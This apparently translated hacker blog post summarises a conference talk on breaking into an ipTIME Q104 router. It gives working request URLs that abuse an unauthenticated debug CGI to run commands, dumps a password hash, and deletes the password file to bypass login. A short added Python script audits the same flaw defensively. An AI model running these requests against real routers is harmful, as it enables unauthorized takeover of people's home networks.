SECUINSIDE presentation video by 정우형
http://www.youtube.com/watch?v=_6XrBSrnkTQ&feature=youtu.be
Dailysecu article
http://www.dailysecu.com/news_view.php?article_id=2585
* Summary of the IPTIME router hacking process *

o Device name : IpTIME Q104
o Vendor : EFM Networks
o Access port : http://192.168.0.1 (http://192.168.0.1:55555, http://192.168.255.1:55555)

- Authentication uses BASIC Auth
- Tried the default password (admin/null) and some easy passwords, but failed.
- Because of the WolfTeam game, excessive traffic was detected and blocked, and a warning window appeared
- View source => confirmed that the report screen is built with an iframe
- Source : <iframe width="600" height="430" name="subwin" src="http://192.168.0.1/nd-bin/netdetect.cgi?flag=nd-report">
- http://192.168.0.1/cgi-bin/timepro.cgi?flag=debug goes through AUTH, but
  http://192.168.0.1/nd-bin/netdetect.cgi?flag=debug does not, and shows the form below

  File Name : [ ]
  Command Name : [ ]
  [Show]

  The form's action is /cgi-bin/timepro.cgi, but pointing it at netdetect.cgi and entering the desired command in the cmd input field executes it!

-----------------------
/var/boa_vh.conf
-----------------------
Port 55555
User root
Group root
ServerAdmin root@localhost
VirtualHost
DocumentRoot /home/httpd
UserDir public_html
DirectoryIndex index.html
KeepAliveMax 100
KeepAliveTimeout 10
MimeTypes /etc/mime.types
DefaultType text/plain
AddType application/x-httpd-cgi cgi
AddType text/html html
ScriptAlias /cgi-bin/ /bin/
ScriptAlias /nd-bin/ /bin/
ScriptAlias /login/ /bin/login/
ScriptAlias /ddns/ /bin/ddns/
ScriptAlias /testbin/ /tmp/
ServerName IPRouter
SinglePostLimit 2097152
Auth /cgi-bin /etc/httpd.passwd
Auth /main /etc/httpd.passwd

-----------------------
/var/firewall_rule
-----------------------
separator:----- Messenger -----:0:
aim:AIM:1:32:nat:app_filter:tcp:0:5190:filter_dnat:0
buddy:버디버디:3:32:nat:app_filter:tcp:0:952:filter_dnat:0:+:32:nat:app_filter:tcp:0:810-819:filter_dnat:0:+:32:nat:app_filter:tcp:0:940-959:filter_dnat:0
icq:ICQ:1:32:nat:app_filter:tcp:0:5190:filter_dnat:0
iman:IMAN(KT):1:32:nat:app_filter:tcp:0:5282:filter_dnat:0
irc:IRC:2:32:nat:app_filter:tcp:0:6660-6669:filter_dnat:0:+:32:nat:app_filter:udp:0:6660-6669:filter_dnat:0
msm:MSN 메신저:3:32:nat:app_filter:tcp:0:1863:filter_dnat:0:+:32:nat:app_filter:tcp:0:6891-6900:filter_dnat:0:+:16:url:messenger.hotmail.com:
nateon:네이트온:2:32:nat:app_filter:tcp:0:5004:filter_dnat:0:+:16:url:prs.nate.com:
tachy:타키(SayClub):1:32:nat:app_filter:tcp:0:6699:filter_dnat:0
separator:-------- P2P --------:0:
edonkey:eDonkey,Pruna,eMule:1:32:nat:app_filter:tcp:0:4661-4662:filter_dnat:0
fileguri:파일구리:1:32:nat:app_filter:tcp:0:9493:filter_dnat:0
guruguru:구루구루:2:32:nat:app_filter:tcp:0:9292:filter_dnat:0:+:32:nat:app_filter:tcp:0:22000-22400:filter_dnat:0
soribard:소리바다:2:32:nat:app_filter:udp:0:7674-7675:filter_dnat:0:+:32:nat:app_filter:udp:0:22321:filter_dnat:0
winmx:WinMX:2:32:nat:app_filter:tcp:0:6699:filter_dnat:0:+:32:nat:app_filter:udp:0:6257:filter_dnat:0
separator:-------- Game -------:0:
diable:디아블로:1:32:nat:app_filter:tcp:0:4000:filter_dnat:0
kartrider:카트라이더:2:32:nat:app_filter:tcp:0:39311:filter_dnat:0:+:32:nat:app_filter:tcp:0:36567:filter_dnat:0
lineage:리니지:2:32:nat:app_filter:tcp:0:1950-2002:filter_dnat:0:+:32:nat:app_filter:tcp:0:2004-2200:filter_dnat:0
mu:뮤:1:32:nat:app_filter:tcp:0:44405:filter_dnat:0

-----------------------
/etc/httpd.passwd
-----------------------
admin:$1S89Y1UUF3Ls:

- Using the echo command, reset the password by setting the contents of httpd.passwd to "admin::", then connect without password authentication!!
- http://192.168.255.1:55555/cgi-bin/timepro.cgi?flag=debug&cmd=rm -f /etc/httpd.passwd
  http://192.168.255.1:55555/cgi-bin/timepro.cgi?flag=debug&cmd=cp /etc/httpd.passwd.bak /etc/httpd.passwd
- Must restore it after the work is done~

by xcuter
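
Added example (not part of the original post and not vendor code): the reason /nd-bin/ skips AUTH is visible in boa_vh.conf above, where /cgi-bin/ and /nd-bin/ both map to /bin/ but only /cgi-bin has an Auth line. The audit below flags such aliases; the function names are hypothetical, and it assumes an Auth rule covers a URL prefix and everything under it.

```python
# Added example: audit Boa-style ScriptAlias/Auth directives (not vendor code).
# SAMPLE_CONF is constructed from the directives quoted in the post.
SAMPLE_CONF = """\
ScriptAlias /cgi-bin/ /bin/
ScriptAlias /nd-bin/ /bin/
ScriptAlias /login/ /bin/login/
ScriptAlias /ddns/ /bin/ddns/
ScriptAlias /testbin/ /tmp/
Auth /cgi-bin /etc/httpd.passwd
Auth /main /etc/httpd.passwd
"""


def parse(conf):
    """Return ({url_prefix: directory}, [auth_prefix, ...])."""
    aliases, auth = {}, []
    for line in conf.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        if parts[0] == "ScriptAlias":
            aliases[parts[1].rstrip("/")] = parts[2].rstrip("/") or "/"
        elif parts[0] == "Auth":
            auth.append(parts[1].rstrip("/"))
    return aliases, auth


def is_protected(prefix, auth):
    # Assumption: an Auth rule covers a URL prefix and everything below it.
    return any(prefix == a or prefix.startswith(a + "/") for a in auth)


def audit(conf):
    """List script aliases that no Auth rule covers."""
    aliases, auth = parse(conf)
    protected_dirs = {d for p, d in aliases.items() if is_protected(p, auth)}
    findings = []
    for prefix, directory in sorted(aliases.items()):
        if is_protected(prefix, auth):
            continue
        # Same directory as a protected alias: the same CGIs answer without auth.
        kind = "auth-bypass-alias" if directory in protected_dirs else "unauthenticated-alias"
        findings.append((prefix, directory, kind))
    return findings


if __name__ == "__main__":
    for prefix, directory, kind in audit(SAMPLE_CONF):
        print(f"{kind:22} {prefix:10} -> {directory}")
```

The auth-bypass-alias finding for /nd-bin corresponds to the netdetect.cgi behaviour described in the post.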